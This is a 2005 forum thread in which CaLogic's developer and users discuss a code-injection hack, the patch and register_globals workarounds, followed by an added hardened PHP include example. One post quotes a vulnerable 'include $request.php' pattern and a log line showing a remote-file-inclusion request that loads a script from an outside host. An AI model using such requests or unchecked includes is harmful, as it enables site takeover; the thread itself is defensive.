CaLogic Support Site Forum: CaLogic usage & bug reports
Code injection security issue? Site hacked!
| Poster | Thread |
|---|---|
| Anonymous | Posted on: 2005/7/19 18:22 |
|
Re: Solution Unfortunately users with webspace at providers can't edit their php.ini and register_globals=on is mostly default with providers.
The only way to fix this correctly is to check the input variables everywhere! |
|
| Philip | Posted on: 2005/7/19 20:21 |
Webmaster Joined: 2002/10/15 From: Köln Germany Posts: 778 |
Re: Solution My deepest apologies to everyone that was hacked. If it is any consolation, I was hacked too, but not only hacked, my entire web folder was deleted. Thank god for backups!

I have addressed this security issue, and have already released a patch. To patch your CaLogic, download the 1.2.2 distribution zip file, and upload all contents to your CaLogic folder. If you are using the mini cal plugin, you will need to re-configure the page you are displaying the mini cal in. To do this, please refer to the instructions in the mcpi-demo.php file.

If you do not use the mini calendar plug in, you can also stop the security leak by deleting these 4 files from your CaLogic root folder:
mcconfig.php
clmcpreload.php
mcpi-demo.php
cl_minical.php

I will not be publishing fixes to earlier versions of CaLogic. I will however, fix a previous version if specifically asked to do so. If you continue to use a previous version and are not using the mini cal plugin, then please delete the 4 files as stated above. If however you do use the mini cal plug in, then you should update your CaLogic. If you cannot or don't want to update, then please contact me for a fix of the version you are using.

Once again, please accept my apologies.
Philip Boone
Let's pray that there are no more holes in CaLogic.
|
| Anonymous | Posted on: 2005/7/19 22:55 |
|
Re: Solution Nobody's perfect.
What about the isset() instructions? I read that they could be misused too, if the parameters are not checked, as described here: http://www.devshed.com/c/a/PHP/PHP-Security-Mistakes/ |
|
| Anonymous | Posted on: 2005/7/19 23:08 |
|
Re: Solution OK, please forgive me, it's doing an include after that, and the include is the problem we know.
CaLogic is still the best calendar ever seen. Anyway, I will take my time to let this settle. |
|
| Philip | Posted on: 2005/7/20 0:53 |
Webmaster Joined: 2002/10/15 From: Köln Germany Posts: 778 |
Re: Solution Thanks
|
| Anonymous | Posted on: 2005/7/20 14:46 |
|
Re: Solution Under Apache one can disable register_globals in an .htaccess file per directory with the statement php_flag register_globals off. But I'm not sure whether commercial providers leave this opportunity to their clients.
Frank |
|
| Anonymous | Posted on: 2005/7/20 16:27 |
|
Re: Solution Hi,
I tried Frank's great tip, but my provider won't let me set php_flags in .htaccess files. But they allowed me to use a php.ini file containing only the line register_globals=off. CAUTION! Unlike .htaccess, the php.ini does NOT work recursively and has to be copied to EVERY directory that should be protected.
Have fun
Andy |
|
| Philip | Posted on: 2005/7/25 17:08 |
Webmaster Joined: 2002/10/15 From: Köln Germany Posts: 778 |
Re: Solution Thanks to everyone for all the tips, help, and above all patience in this matter.
Philip
|
| Anonymous | Posted on: 2005/7/28 23:17 |
|
Re: Solution My server had a PHP script like this:
www.mydomain.com/index.php?request=abc and abc was a PHP script that was included like this:
=======
include header.php
include $request.php
include footer.php
========
From my web logs, my site was called like: www.mydomain.com/index.php?request=http://f58.aaa.livedoor.jp/~picapau/tool25.dat?&cmd=w where the funny Japanese site has the PHP script that did all the damage. I am busy rewriting the index.php. Hope it helps. |
|
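As an added example (not CaLogic's own code and not from the poster above), a hardened replacement for the `include $request.php` pattern just described: the page name is read explicitly from $_GET so it does not depend on register_globals being off, looked up in a fixed allowlist instead of being turned into a path, and rejected values are logged for review. The `pages/` file names are assumed.

```php
<?php
// Added example (not CaLogic's own code, PHP 7+). Hardened replacement for
// the "include $request.php" pattern quoted in the post above. The file
// names under pages/ are assumed for illustration.

// Allowlist: the only include targets the application will ever use.
// A request that is not a key here is never turned into a path.
function page_map(): array
{
    return [
        'abc'  => 'pages/abc.php',
        'news' => 'pages/news.php',
    ];
}

// Crude indicator for log review: a page name should never carry a URL
// scheme, a directory separator or "..". The log line quoted in the post
// (request=http://...) would trip this check.
function looks_suspicious(string $value): bool
{
    return (bool) preg_match('#://|[/\\\\]|\.\.#', $value);
}

// Resolve the page from an explicit $_GET lookup rather than from a global
// that register_globals may or may not have populated; unknown names fall
// back to a known page (or send a 404 instead, if preferred).
function resolve_page(array $get): string
{
    $pages   = page_map();
    $request = isset($get['request']) ? (string) $get['request'] : 'abc';
    if (!array_key_exists($request, $pages)) {
        if (looks_suspicious($request)) {
            error_log('rejected include request: ' . $request);
        }
        return $pages['abc'];
    }
    return $pages[$request];
}

function render_safe(array $get): void
{
    include 'header.php';
    include resolve_page($get);   // always one of the allowlisted files
    include 'footer.php';
}

render_safe($_GET);
```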
| Philip | Posted on: 2005/8/29 10:46 |
Webmaster Joined: 2002/10/15 From: Köln Germany Posts: 778 |
Re: Solution Hi,
as far as I know, CaLogic has no more security / code injection errors. If you find any, please let me know before the hackers do.
Thanks
Philip
|